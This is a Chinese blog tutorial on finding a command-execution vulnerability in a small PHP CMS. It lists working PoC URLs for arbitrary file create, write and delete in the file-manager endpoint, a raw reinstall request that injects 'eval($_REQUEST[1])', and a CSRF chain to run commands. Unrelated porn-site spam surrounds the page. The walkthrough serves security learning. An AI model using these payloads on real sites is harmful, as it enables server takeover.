在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

jf_hKIAo4na ? 來源:菜鳥學(xué)安全 ? 2023-05-18 17:18 ? 次閱讀

0x01 前言

大概是在上半年提交了某個CMS的命令執(zhí)行漏洞,現(xiàn)在過了那么久,也想通過這次挖掘通用型漏洞,整理一下挖掘思路,分享給大家。

0x02 挖掘前期

一、CMS選擇

如果你是第一次挖白盒漏洞,那么建議你像我一樣,先找一些簡單的來挖掘。

具體源碼下載地址可以參考:

https://github.com/search?q=cms
https://search.gitee.com/?skin=rec&type=repository&q=cms
https://down.chinaz.com/
https://www.a5xiazai.com/
......

百度找找,肯定不止這些

那么應(yīng)該怎么選擇呢(這里我是站在第一次挖掘,或者僅使用過掃描工具掃描的師傅的角度這樣說的,如果做過開發(fā),代碼功底很強(qiáng)等情況,emm...當(dāng)我沒說。):

1、找最新版的版本較低的,例如1.1、1.2
2、找github star不多的
3、找源碼總?cè)萘啃〉?4、盡量不要找使用tp、yii、laravel等框架型CMS

這里說一下理由:
1、如果cms版本高,說明開發(fā)有經(jīng)常維護(hù),同時也說明里面的簡單漏洞已經(jīng)被發(fā)現(xiàn)并且被提交并整改了。(具體這個可以看看CMS官網(wǎng)放出的更新日志)

2、為什么找github star不多的cms?很簡單,使用的人不多,沒人標(biāo)星,功能也比較少。


3、源碼少容易看啊,而且想著源代碼就那么點(diǎn),看著也不會太心累。


4、這是我個人的理解哈,因?yàn)榫拖窈芏嗳苏f的,第一個審的可以看看bluecms。為什么?因?yàn)楹唵伟。瑃p框架首先各種C方法,I方法的,就夠頭疼了。

e8022e22-f143-11ed-90ce-dac502259ad0.pnge821c156-f143-11ed-90ce-dac502259ad0.png

扯了那么多,總結(jié)一句話:

跟挖SRC一樣,如果你一開始就瞄著阿里SRC、百度SRC等來挖掘,一直挖不到洞,是不是心態(tài)崩了呢;如果你一開始借助nday的poc,結(jié)合fofa搜集資產(chǎn),一下子就能挖到簡單、小型企業(yè)的漏洞,雖然可能漏洞獎金不多、但是滿滿的成就感有沒有~

代碼審計(jì)也是一樣的,一開始就找框架型的,MVC架構(gòu)的CMS,不僅可能看不懂代碼,還可能連路由都弄不懂呢。所以一開始還是找些簡單的練練手比較好~

二、環(huán)境準(zhǔn)備

1、PHPstudy

PHP、中間件、數(shù)據(jù)庫,一個軟件搞定,反正我是覺得用著很香。

e82bee2e-f143-11ed-90ce-dac502259ad0.png

2、代碼掃描工具

目前的話我用的比較多的是seay和fortify。這里其實(shí)都一樣,不是所有漏洞都是要通讀代碼來發(fā)現(xiàn)的,有的時候借助工具可以快很多。

e847d5a8-f143-11ed-90ce-dac502259ad0.pnge8592470-f143-11ed-90ce-dac502259ad0.png

3、BurpSuite

滲透測試神器級別的工具,這里不多介紹了,畢竟挖漏洞不抓包怎么行呢。

e863b4ee-f143-11ed-90ce-dac502259ad0.png

4、漏洞掃描工具

雖然我們拿到了源碼,但是挖漏洞也不一定要從代碼上進(jìn)行呀,可以結(jié)合黑盒的方式,黑白盒一起,更容易挖到漏洞,也就是業(yè)內(nèi)說的灰盒測試。

掃描工具這里推薦Xray+burp聯(lián)動進(jìn)行。隨便抓幾個包,有沒有漏洞一目了然,讓我們可以在測試漏洞的時候,還同時進(jìn)行掃描。

e8885a42-f143-11ed-90ce-dac502259ad0.png

5、編輯器

編輯器的作用是方便查看代碼,在有需要的時候才用,這里可以算是我水字?jǐn)?shù)吧,我個人比較喜歡nopad++,當(dāng)然別的也是可以的,phpstorm最好,可以快捷進(jìn)行函數(shù)跳轉(zhuǎn)。

工具下載地址:

https://www.xp.cn/
https://github.com/f1tz/cnseay
https://github.com/chaitin/xray/releases

三、搭建環(huán)境

1、首先下載源碼,解壓并放到phpstudy安裝目錄下的WWW文件夾中

e89d2c60-f143-11ed-90ce-dac502259ad0.png

2、安裝方法一般是請求http://127.0.0.1/install/就可以了,按照提示輸入信息

e8c2e70c-f143-11ed-90ce-dac502259ad0.png

3、提示安裝成功即可

e8d97fb2-f143-11ed-90ce-dac502259ad0.png

0x03 挖掘中期

一、代碼掃描

借助seay自帶的自動審計(jì)功能進(jìn)行代碼掃描 e8f7501e-f143-11ed-90ce-dac502259ad0.png

二、黑白盒配合發(fā)現(xiàn)漏洞

這個其實(shí)是很有搞頭的,這里沒有詳細(xì)說是因?yàn)楫?dāng)時確實(shí)重心在白盒上,實(shí)際上我感覺這個發(fā)現(xiàn)漏洞再去找對應(yīng)的代碼,會更加有趣些。

1、瀏覽器設(shè)置代理,指向burp:127.0.0.1:8080

e9181c72-f143-11ed-90ce-dac502259ad0.pnge9315106-f143-11ed-90ce-dac502259ad0.png ? 2、burp設(shè)置代理,指向xray:127.0.0.1:7777 e9411686-f143-11ed-90ce-dac502259ad0.png ? 3、開啟xray被動掃描,命令:

./xray_darwin_amd64 webscan --listen 127.0.0.1:7777 --html-output test.html
e9549ddc-f143-11ed-90ce-dac502259ad0.png ? 4、在每個功能點(diǎn)都點(diǎn)一點(diǎn),就跟正常測黑盒即可 e9661a30-f143-11ed-90ce-dac502259ad0.png ? 5、查看xray掃描結(jié)果 e9827e6e-f143-11ed-90ce-dac502259ad0.png ? 6、查看代碼掃描結(jié)果 e99bf772-f143-11ed-90ce-dac502259ad0.png ?

三、分析掃描結(jié)果

1、將結(jié)果一個個點(diǎn)擊查看,分析漏洞是否真實(shí)存在 因?yàn)楣ぞ呤前凑照齽t匹配來進(jìn)行掃描的,總會出現(xiàn)一些可能存在,但是實(shí)際不存在的情況,例如這個: e9b74fcc-f143-11ed-90ce-dac502259ad0.png ? 因?yàn)?_G['SYSTEM']['PATH']疑似為可控變量,所以爆出任意文件包含漏洞,那么實(shí)際上,往上看可以發(fā)現(xiàn)$_G['SYSTEM']['PATH']其實(shí)已經(jīng)事先定義好了。 e9c64888-f143-11ed-90ce-dac502259ad0.png ? 2、定位漏洞
1)發(fā)現(xiàn)一個file_get_contents,可控變量為$path e9d221bc-f143-11ed-90ce-dac502259ad0.png ? 往前看,$path為我們直接get傳入,只是做了一些限制與鑒權(quán),沒有進(jìn)行過濾 e9f301fc-f143-11ed-90ce-dac502259ad0.png

$path = realpath($_GET['path']);
if (!$path) {
    if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
        PkPopup('{content:"不存在的路徑,請求路徑:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
    }
    ExitJson('不存在的路徑,請求路徑:' . $_GET['path']);
}
$_G['TEMP']['PATH'] = iconv('GBK', 'UTF-8//IGNORE', $path);
if (strpos($path, $spath) !== 0) {
    if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
        PkPopup('{content:"越權(quán)操作,請求路徑:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
    }
    ExitJson('越權(quán)操作,請求路徑:' . $_GET['path']);
}


switch ($type) {
    case 'edit' :
        if (filetype($path) != 'file') {
            if ($_G['GET']['JSON']) {
                ExitJson('不存在的文件');
            }
            PkPopup('{content:"不存在的文件",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        $suffix = substr($path, strrpos($path, '.') + 1);
        if (!InArray($suffixs, $suffix)) {
            if ($_G['GET']['JSON']) {
                ExitJson('不支持的文件格式');
            }
            PkPopup('{content:"不支持的文件格式",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        $filecontent1 = file_get_contents($path);
        $filecontent = htmlspecialchars($filecontent1, ENT_QUOTES);
        if ($filecontent1 && !$filecontent) {
            if ($_G['GET']['JSON']) {
                ExitJson('不支持該文件編碼,僅支持UTF-8');
            }
            PkPopup('{content:"不支持該文件編碼,僅支持UTF-8",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        if ($_G['GET']['JSON']) {
            ExitJson($filecontent1, TRUE);
        }
        $path = str_replace('\', '/', $path);
        $paths = explode('/', $path);
        $path = '';
        for ($i = 0; $i < count($paths); $i++) {
            if ($i == count($paths) - 1) {
                $filename = $paths[$i];
            } else {
                $path .= $paths[$i] . '/';
            }
        }
        ExitGourl('index.php?c=app&a=filesmanager:index&path=' . urlencode(realpath($path)) . '&editbtn=' . md5($filename));
        break;
2)往下看,對$path進(jìn)行unlink(),即刪除操作

ea08abe2-f143-11ed-90ce-dac502259ad0.png

case 'del' :
        $r = unlink($path);
        ExitJson('操作完成', $r);
        break;
3)再往下,傳入mkname,使用file_put_contents進(jìn)行文件創(chuàng)建,內(nèi)容為空。很明顯只是檢測是否存在重復(fù)創(chuàng)建的情況,未進(jìn)行過濾。

ea1253ea-f143-11ed-90ce-dac502259ad0.png

case 'mkfile' :
        $mkname = $_GET['mkname'];
        if (!$mkname) {
            ExitJson('請輸入目錄或文件的名稱');
        }
        if ($type == 'mkdir') {
            if (file_exists($path . "/{$mkname}")) {
                ExitJson('目錄已存在');
            }
            $r = mkdir($path . "/{$mkname}");
        } else {
            if (file_exists($path . "/{$mkname}")) {
                ExitJson('文件已存在');
            }
            $r = file_put_contents($path . "/{$mkname}", '');
        }
        ExitJson('操作完成', $r === FALSE ? FALSE : TRUE);
        break;
}
3、研究路由,查看如何調(diào)用漏洞函數(shù) 1)首先查看這個漏洞路徑,字面上意思是在/app/目錄下的一個文件管理的操作
/app/filesmanager/index.php
2)回到網(wǎng)站,剛剛黑盒測試的時候,發(fā)現(xiàn)路由規(guī)律為: ea2524e8-f143-11ed-90ce-dac502259ad0.pngea330fe0-f143-11ed-90ce-dac502259ad0.png ? 請求了http://url/index.php?c=read&id=1&page=1后,會發(fā)出這樣的一個請求:
/index.php?c=app&a=puyuetianeditor:index&s=myfiles&page=1
通過a=puyuetianeditor:index,定位文件位置為/app/puyuetianeditor/index.php ea4328d0-f143-11ed-90ce-dac502259ad0.png ? 3)在文件中看到繼續(xù)請求了'/app/puyuetianeditor/phpscript/' . $_G['GET']['S'] . '.php,在URL中可以看到s傳入的參數(shù)為myfiles,所以可以定位文件路徑為:
/app/puyuetianeditor/phpscript/myfiles.php

ea53b3f8-f143-11ed-90ce-dac502259ad0.png

4)漏洞路徑/app/filesmanager/index.php即可以對應(yīng)URL

/?c=app&a=filesmanager:index

四、驗(yàn)證漏洞

任意創(chuàng)建文件

1、搭建網(wǎng)站并登錄進(jìn)網(wǎng)站后臺 ea6601a2-f143-11ed-90ce-dac502259ad0.png ? 2、漏洞存在點(diǎn)為/app/filesmanager/index.php

ea872c74-f143-11ed-90ce-dac502259ad0.png

3、進(jìn)行一些操作后,通過file_put_contents創(chuàng)建文件,poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=mkfile&mkname=123.php
ea96b9dc-f143-11ed-90ce-dac502259ad0.png ? 4、在網(wǎng)站根目錄可以看到文件創(chuàng)建成功 eaa69cbc-f143-11ed-90ce-dac502259ad0.png ?

任意文件寫入

poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=save&path=123.php
POST:
filecontent=
eab58592-f143-11ed-90ce-dac502259ad0.png ? 可以看到文件內(nèi)容成功寫入 eacc5448-f143-11ed-90ce-dac502259ad0.png ? 嘗試執(zhí)行命令 eaf64b54-f143-11ed-90ce-dac502259ad0.png ?

任意文件刪除

poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=del&path=123.php
eb1b3fe0-f143-11ed-90ce-dac502259ad0.png ? 漏洞文件存在的路徑為/app/filesmanager/index.php eb2a582c-f143-11ed-90ce-dac502259ad0.png ? 可以看到123.php文件已成功刪除。 eb3accfc-f143-11ed-90ce-dac502259ad0.png ?

五、組合漏洞擴(kuò)大成果

1、任意文件刪除配合系統(tǒng)重裝(失敗)

以前就有看到過這樣的漏洞,因?yàn)橄到y(tǒng)重裝的時候,會將用戶輸入的配置信息寫入到php文件中,那么如果可以輸入代碼,便可以成功執(zhí)行了,這里嘗試一下。


1)首先查看index.php文件
只要install.locked文件存在即表示網(wǎng)站已安裝

eb47f3e6-f143-11ed-90ce-dac502259ad0.png ? 2)再看/install/index.php,可以看到也是這個文件存在即不能重裝系統(tǒng)。 eb6bf930-f143-11ed-90ce-dac502259ad0.png

3)通過任意文件刪除,將此文件進(jìn)行刪除:

http://192.168.150.9/index.php?c=app&a=filesmanager:index&type=del&path=C://phpStudy/WWW/install/install.locked
eb7c3dfe-f143-11ed-90ce-dac502259ad0.png ? 4)訪問/install/index.php即可進(jìn)行重裝系統(tǒng)操作 eb8dc7a4-f143-11ed-90ce-dac502259ad0.png ? 5)正常執(zhí)行,在step=2的時候,輸入數(shù)據(jù)庫等信息 ebafabc6-f143-11ed-90ce-dac502259ad0.pngebc36efe-f143-11ed-90ce-dac502259ad0.png ? 定位到/phpscript/environment.php文件 ebe852e6-f143-11ed-90ce-dac502259ad0.png ? 再到/template/environment.hst ebf585c4-f143-11ed-90ce-dac502259ad0.png ? 發(fā)現(xiàn)關(guān)鍵字mysql_username ec095946-f143-11ed-90ce-dac502259ad0.png ? 全局搜索一下,定位文件位置: ec2c8182-f143-11ed-90ce-dac502259ad0.pngec49c1c0-f143-11ed-90ce-dac502259ad0.png ? 可以看到配置信息最后會寫入到這里。 ec7f0c04-f143-11ed-90ce-dac502259ad0.png ? 6)抓取傳入信息的數(shù)據(jù)包,進(jìn)行測試 eca33b42-f143-11ed-90ce-dac502259ad0.png ? 多次fuzz,確認(rèn)確實(shí)可以寫入一些東西
POST /install/index.php?step=3 HTTP/1.1
Host: 192.168.150.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://192.168.150.9
Connection: close
Referer: http://192.168.150.9/install/index.php?step=2
Cookie: PHPSESSID=b9imt0v97o8hsml01jr0tro9n3; UIA=KXoyLywxNlo2YDQtLl8tX2BlMjAqLzUqX103Y1xlZWBcMzFeXi4xXjQsYDBeMC8tZDEsXjIxMCoxLjIvXmQ1Y14w; app_puyuetianeditor_editcontent=%3Cbr%3E


_webos=*&mysql_type=mysql&mysql_location=127.0.0.1&mysql_username=root&mysql_password=root&mysql_database='eval($_REQUEST[1])&mysql_prefix=pk_&mysql_charset=set+names+utf8&adminusername=phpinfo();&adminpassword=phpinfo();&adminemail=admin%40qq.com&hs_username=&hs_password=&hs_domain=192.168.150.9
ecb6a34e-f143-11ed-90ce-dac502259ad0.png ? 7)最后發(fā)現(xiàn)不能傳入;,否則會報(bào)錯 eccc644a-f143-11ed-90ce-dac502259ad0.png ? 8)假設(shè)傳入進(jìn)去了,又會顯示403 ecf420ac-f143-11ed-90ce-dac502259ad0.pnged094bc6-f143-11ed-90ce-dac502259ad0.png ? 9)感覺有機(jī)會,后面就看師傅們嘗試了。。。 ?

2、任意文件寫入配合CSRF(成功)

在dedecms中看到過的漏洞,因?yàn)楹笈_的任意寫文件在沒有管理員權(quán)限的支持下無法利用,那么倘若配合CSRF漏洞,借用管理員的cookie便可以直接執(zhí)行,擴(kuò)大漏洞危害。 在這里嘗試一下: 1)首先抓取寫入文件的數(shù)據(jù)包,可以看到?jīng)]有明顯的token等字段 ed181cd2-f143-11ed-90ce-dac502259ad0.png ? 2)在漏洞文件中只是看到了權(quán)限檢測 ed2f97fe-f143-11ed-90ce-dac502259ad0.png ? 3)使用burp生成任意文件寫入的CSRF漏洞POC,保存為test.html ed472252-f143-11ed-90ce-dac502259ad0.pnged6cdac4-f143-11ed-90ce-dac502259ad0.png ? 4)生成任意文件創(chuàng)建的CSRF漏洞POC ed87c87a-f143-11ed-90ce-dac502259ad0.png ? 5)將兩個文件整合到一起,并設(shè)置自動提交


   
  
  
    
6)在已登錄的瀏覽器中打開test.html文件,跳轉(zhuǎn)了幾次后,顯示ok,保存失敗 eda1862a-f143-11ed-90ce-dac502259ad0.png ? 跟前面任意文件寫入的返回是一樣的,在網(wǎng)站根目錄可以看到已經(jīng)成功寫入了 edb51df2-f143-11ed-90ce-dac502259ad0.png ? 執(zhí)行命令 edc9ff10-f143-11ed-90ce-dac502259ad0.png ?

0x04 挖掘后期&總結(jié)

挖掘后干嘛?提交漏洞唄~ 好的,這個算是剛開始學(xué)習(xí)沒多久挖掘到的漏洞,其實(shí)現(xiàn)在覺得技術(shù)含量不高,發(fā)現(xiàn)漏洞也不難,主要想分享一下過程以及思路。 最后,希望看到這篇文章到小伙伴也能很快挖掘到通用型漏洞~

審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • 源碼
    +關(guān)注

    關(guān)注

    8

    文章

    652

    瀏覽量

    29454
  • 代碼
    +關(guān)注

    關(guān)注

    30

    文章

    4827

    瀏覽量

    69052
  • 漏洞
    +關(guān)注

    關(guān)注

    0

    文章

    204

    瀏覽量

    15425

原文標(biāo)題:實(shí)戰(zhàn) | 某通用型漏洞挖掘思路分享

文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析

    存在任意文件讀取漏洞和遠(yuǎn)程命令執(zhí)行漏洞,攻擊者通過該漏洞可以獲取服務(wù)器權(quán)限,導(dǎo)致服務(wù)器失陷。 二、漏洞
    發(fā)表于 03-01 15:09 ?3953次閱讀

    AlphaFuzzer漏洞挖掘工具的使用

    AlphaFuzzer是一款多功能的漏洞挖掘工具,到現(xiàn)在為止,該程序以文件格式為主。1.0版本主要包含了:一個智能文件格式的漏洞挖掘框架。一個通用
    發(fā)表于 07-15 06:44

    開源鴻蒙 OpenHarmony 獲得 CVE 通用漏洞披露編號頒發(fā)資質(zhì)

    8月15日晚間,開源鴻蒙 OpenAtom OpenHarmony 官方宣布于 8 月 3 日獲得通過 CNA(通用漏洞披露編號授權(quán)機(jī)構(gòu))加入程序,成為 CVE(通用漏洞披露組織)的編
    發(fā)表于 08-17 11:34

    基于符號執(zhí)行技術(shù)實(shí)現(xiàn)的驅(qū)動程序的漏洞檢測

    思路,提出了一種基于符號執(zhí)行技術(shù)實(shí)現(xiàn)的驅(qū)動程序模擬環(huán)境,可以用于分析和檢測Linux設(shè)備驅(qū)動程序中存在的安全漏洞。該環(huán)境通過模擬內(nèi)核提供給驅(qū)動程序的服務(wù)接口,使驅(qū)動程序可以在應(yīng)用層進(jìn)行符號執(zhí)
    發(fā)表于 12-05 16:06 ?0次下載
    基于符號<b class='flag-5'>執(zhí)行</b>技術(shù)實(shí)現(xiàn)的驅(qū)動程序的<b class='flag-5'>漏洞</b>檢測

    Adobe發(fā)布安全更新,修復(fù)了Adobe Acrobat與Reader中多個關(guān)鍵安全漏洞

    據(jù)悉,在這87個漏洞中,共有39個高危漏洞,這將允許攻擊者在受感染計(jì)算機(jī)上執(zhí)行代碼或提升權(quán)限。代碼執(zhí)行漏洞可允許攻擊者在受感染計(jì)算機(jī)上
    的頭像 發(fā)表于 12-14 14:25 ?2890次閱讀

    ThinkPHP5.0.遠(yuǎn)程代碼執(zhí)行漏洞預(yù)警

    Thinkphp5.0.*存在遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實(shí)現(xiàn)任意代碼執(zhí)行等高危操作。
    的頭像 發(fā)表于 01-26 16:26 ?3309次閱讀
    ThinkPHP5.0.遠(yuǎn)程代碼<b class='flag-5'>執(zhí)行</b><b class='flag-5'>漏洞</b>預(yù)警

    1433端口的SQL TOOL執(zhí)行命令錯誤應(yīng)該如何修復(fù)詳細(xì)說明

    然后用SQL TOOLS連接主機(jī),進(jìn)行SQL或者CMD命令執(zhí)行,從而 得主機(jī)的控制權(quán),但是服務(wù)器的管理人員通常會把一些不安全的漏洞補(bǔ)上,所以用sql tools直接執(zhí)行命令成功的幾率不
    發(fā)表于 11-22 16:20 ?2次下載

    思科升級遠(yuǎn)程命令執(zhí)行等高危漏洞

    1月19日,思科發(fā)布了安全公告,旗下小型企業(yè)RV110W,RV130,RV130W和RV215W路由器中發(fā)現(xiàn)了遠(yuǎn)程命令執(zhí)行等高危漏洞,建議盡快升級。以下是漏洞詳情:
    的頭像 發(fā)表于 01-20 15:40 ?1773次閱讀

    漏洞挖掘工具afrog軟件簡介

    afrog 是一款性能卓越、快速穩(wěn)定、PoC 可定制的漏洞掃描(挖洞)工具,PoC 涉及 CVE、CNVD、默認(rèn)口令、信息泄露、指紋識別、未授權(quán)訪問、任意文件讀取、命令執(zhí)行等多種漏洞
    的頭像 發(fā)表于 09-13 09:06 ?1397次閱讀

    linux技術(shù):WAF運(yùn)行命令執(zhí)行方法

    如果命令執(zhí)行的時候遇到攔截命令關(guān)鍵詞的時候可以利用如下方法繞過: "和^是CMD命令中最常見的轉(zhuǎn)義字符,還有成對的括號并不會影響命令
    發(fā)表于 11-07 20:27 ?1029次閱讀

    Linux命令執(zhí)行Bypass常見姿勢介紹

    部署服務(wù)器端為Linux系統(tǒng)的http服務(wù),留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
    的頭像 發(fā)表于 05-22 16:20 ?2069次閱讀
    Linux<b class='flag-5'>命令</b><b class='flag-5'>執(zhí)行</b>Bypass常見姿勢介紹

    Linux命令執(zhí)行Bypass常見姿勢

    部署服務(wù)器端為Linux系統(tǒng)的http服務(wù),留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
    的頭像 發(fā)表于 05-22 16:21 ?859次閱讀
    Linux<b class='flag-5'>命令</b><b class='flag-5'>執(zhí)行</b>Bypass常見姿勢

    系統(tǒng)邏輯漏洞挖掘實(shí)踐

    當(dāng)談及安全測試時,邏輯漏洞挖掘一直是一個備受關(guān)注的話題,它與傳統(tǒng)的安全漏洞(如SQL注入、XSS、CSRF)不同,無法通過WAF、殺軟等安全系統(tǒng)的簡單掃描來檢測和解決。這類漏洞往往涉及
    的頭像 發(fā)表于 09-20 17:14 ?727次閱讀
    系統(tǒng)邏輯<b class='flag-5'>漏洞</b><b class='flag-5'>挖掘</b>實(shí)踐

    uboot命令執(zhí)行過程是什么

    U-boot是通過執(zhí)行u-boot提供的命令來加載Linux內(nèi)核的,其中 命令bootm的功能 即為從memory啟動Linux內(nèi)核映像文件。 在講解bootm加載內(nèi)核之前,先來看看u-boot中
    的頭像 發(fā)表于 12-04 17:31 ?863次閱讀

    bootm命令執(zhí)行流程

    Bootm命令用來從memory啟動內(nèi)核,bootm命令執(zhí)行流程如下圖所示。 在串口終端輸入bootm命令后,執(zhí)行do_bootm函數(shù)來完
    的頭像 發(fā)表于 12-04 17:33 ?1228次閱讀
    bootm<b class='flag-5'>命令</b>的<b class='flag-5'>執(zhí)行</b>流程
    主站蜘蛛池模板: 天堂社区在线视频 | 国产黄色网页 | 国产牛仔裤系列在线观看 | 狠狠五月深爱婷婷网 | 成年女人毛片免费观看97 | 婷婷99 | 神马三级我不卡 | 丁香五月情 | 免费性bbbb台湾 | 波多野结衣三个女人蕾丝边 | 美女色18片黄黄色 | 永久在线观看视频 | 国产精品一区二区综合 | 黄色成人免费网站 | 欧美精品色精品一区二区三区 | 看黄网站免费 | 夜夜天天干 | 狂野欧美性猛交xxxx免费 | 性欧美长视频 | 亚洲伦理一区二区三区 | xxxxxxxxx18免费视频 | 久久久精品免费国产四虎 | 日韩三级视频在线观看 | 久久久精品2021免费观看 | 国产欧美日韩视频免费61794 | 女人张开腿 让男人桶视频 女人张开腿等男人桶免费视频 | 亚洲人成在线精品不卡网 | 国产精品香蕉在线一区 | 国产www色| 国产剧情麻豆三级在线观看 | 天天综合射 | 亚洲在线a | 日本加勒比视频在线观看 | 色婷婷丁香 | 加勒比精品久久一区二区三区 | 成人午夜精品久久久久久久小说 | 四虎影视永久在线观看 | 日韩在线免费看网站 | 免费网站黄成人影院 | 欧美福利片在线观看 | 成人欧美一区二区三区视频不卡 |